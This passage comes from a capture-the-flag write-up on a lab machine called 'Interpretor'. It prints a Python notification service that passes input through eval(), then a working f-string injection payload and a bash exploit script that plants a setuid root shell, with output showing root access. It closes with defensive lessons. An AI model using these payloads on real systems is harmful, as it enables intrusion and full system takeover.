4.2.1 Source: /usr/local/bin/notif.py
from flask import Flask, request, abort
import re, uuid, os
from datetime import datetime
import xml.etree.ElementTree as ET
app = Flask(__name__)
USER_DIR = "/var/secure-health/patients/"
def template(first, last, sender, ts, dob, gender):
pattern = re.compile(r"^[a-zA-Z0-9._'\"(){}=+/]+$")
for s in [first, last, sender, ts, dob, gender]:
if not pattern.fullmatch(s):
return "[INVALID_INPUT]"
try:
year_of_birth = int(dob.split('/')[-1])
except:
return "[INVALID_DOB]"
template = f"Patient {first} {last} ({gender}), {{datetime.now().year - year_of_birth}} years old, received from {sender} at {ts}"
try:
return eval(f"f'''{template}'''")
except Exception as e:
return f"[EVAL_ERROR] {e}"
@app.route("/addPatient", methods=["POST"])
def receive():
if request.remote_addr != "127.0.0.1":
abort(403)
xml_text = request.data.decode()
xml_root = ET.fromstring(xml_text)
patient = xml_root if xml_root.tag=="patient" else xml_root.find("patient")
data = {tag: (patient.findtext(tag) or "") for tag in ["firstname","lastname","sender_app","timestamp","birth_date","gender"]}
notification = template(data["firstname"],data["lastname"],data["sender_app"],data["timestamp"],data["birth_date"],data["gender"])
# ... writes to /var/secure-health/patients/<uuid>.txt
return notification
if __name__=="__main__":
app.run("127.0.0.1",54321, threaded=True)
4.2.2 Workflow Analysis
The service builds a template string and then calls eval(f"f'''{template}'''"). This is a classic Python F-String Injection. Any {...} sequence in the input fields will be evaluated as Python code.
The regex ^[a-zA-Z0-9._'\"(){}=+/]+$ allows curly braces but blocks spaces.
4.3 Python F-String Injection
4.3.1 PoC
Construct a payload to run id:
{__import__("os").popen("id").read()}
XML Payload:
<patient>
<timestamp>0</timestamp>
<sender_app>SmirthConnect</sender_app>
<firstname>{__import__("os").popen("id").read()}</firstname>
<lastname>Havoc</lastname>
<birth_date>01/01/1970</birth_date>
<gender>M</gender>
</patient>
Execution:
$ wget -qO- --header="Content-Type: application/xml" --post-file=poc.xml http://127.0.0.1:54321/addPatient
Patient uid=0(root) gid=0(root) groups=0(root) Havoc (M), 56 years old, received from SmirthConnect at 0

4.3.2 Exploit
To bypass the space restriction, use Base64 encoding for the command.
Exploit Script (xpl.sh):
#!/bin/bash
CMD='install -o root -m 4755 /bin/bash /tmp/.sh'
ENC_CMD=$(printf '%s' "$CMD" | base64 -w0)
PAYLOAD="{__import__(\"os\").popen(__import__(\"base64\").b64decode(\"${ENC_CMD}\").decode()).read()}"
cat > /tmp/xpl.xml << EOF
<patient>
<timestamp>0</timestamp>
<sender_app>SmirthConnect</sender_app>
<firstname>${PAYLOAD}</firstname>
<lastname>Havoc</lastname>
<birth_date>01/01/1970</birth_date>
<gender>M</gender>
</patient>
EOF
wget -qO- --header="Content-Type: application/xml" --post-file=/tmp/xpl.xml http://127.0.0.1:54321/addPatient
Rooted:
sedric@interpreter:/tmp$ bash xpl.sh
sedric@interpreter:/tmp$ /tmp/.sh -p
.sh-5.2# id
uid=1000(sedric) gid=1000(sedric) euid=0(root) groups=1000(sedric)
.sh-5.2# cat /root/root.txt
0**********************************d
and there you have it, pwned

5 CONCLUSION
5.1 Machine Summary
Interpretor demonstrated the critical risks associated with exposed healthcare integration platforms. This Medium-rated machine required a methodical approach combining CVE research, cryptographic analysis, and code review to achieve complete system compromise. The attack path followed a realistic scenario: exploiting a known vulnerability in internet-facing software, extracting credentials from configuration files, and leveraging insecure code execution in internal services.
5.2 Tools Used
| Tool | Purpose | Stage |
|---|---|---|
| RustScan | Fast port scanning and service enumeration | Reconnaissance |
| Nmap | Detailed service fingerprinting | Reconnaissance |
| Metasploit Framework | CVE-2023-43208 exploitation | Initial Access |
| MySQL Client | Database enumeration and credential extraction | User Escalation |
| Python (hashlib) | PBKDF2 password hash cracking | User Escalation |
| LinPEAS | Linux privilege escalation enumeration | Privilege Escalation |
| Wget | HTTP requests for F-string injection payload delivery | Privilege Escalation |
| Base64 | Encoding bypass for command injection | Privilege Escalation |
| Frame OS | Professional screenshot framing and presentation | Documentation |
5.3 Key Takeaways
5.3.1 Security Lessons
1. Healthcare Integration Platforms Are High-Value Targets
- Mirth Connect handles sensitive patient data and has extensive system access
- Default configurations often expose administrative interfaces to the internet
- Version disclosure makes targeted exploitation trivial
2. Java Deserialization Remains Critical
- CVE-2023-43208 demonstrates how serialization flaws enable unauthenticated RCE
- XStream and similar libraries require careful security configuration
- Incomplete patches can introduce bypass opportunities
3. Configuration Files Are Goldmines
- Mirth properties file contained database credentials and keystore passwords
- Hardcoded credentials in plaintext enable lateral movement
- Configuration management must include secrets rotation and encryption
4. Weak Password Hashing Is Exploitable
- Despite using PBKDF2 with 600,000 iterations, weak passwords remain vulnerable
- Password complexity policies must enforce strong passphrases
- Multi-factor authentication should be mandatory for administrative access
5. Code Injection in Internal Services
- The Python notification service used
eval()with user-controlled input - F-string injection enabled arbitrary code execution despite input validation
- Internal services often lack security controls assuming trusted environments
5.3.3 Defensive Recommendations
Immediate Actions:
- Update Mirth Connect to the latest patched version
- Disable remote administrative access or place behind VPN
- Implement network segmentation for healthcare systems
- Enable comprehensive logging and monitoring
Long-Term Mitigations:
- Deploy Web Application Firewall (WAF) with deserialization attack signatures
- Implement certificate-based authentication for Mirth administrators
- Use secrets management solutions (HashiCorp Vault, AWS Secrets Manager)
- Enforce multi-factor authentication on all administrative interfaces
- Conduct regular penetration testing of healthcare infrastructure
- Implement least-privilege principles for service accounts
Code Security:
- Never use
eval()with user-controlled input - Validate and sanitize all external data before processing
- Use parameterized queries and prepared statements
- Implement proper input validation beyond regex patterns
- Apply security linters and SAST tools in CI/CD pipelines
5.4 Final Thoughts
This machine showcases a realistic attack scenario targeting healthcare infrastructure. The exploitation path from internet-facing vulnerability to root access mirrors real-world breaches in medical environments. Organizations running integration platforms must prioritize patching, credential management, and defense-in-depth strategies. The combination of CVE exploitation, cryptographic attacks, and code injection demonstrates why layered security controls are essential—a single vulnerability should never grant complete system compromise.
Stay secure, stay curious, and keep hacking responsibly! 🛡️
Comments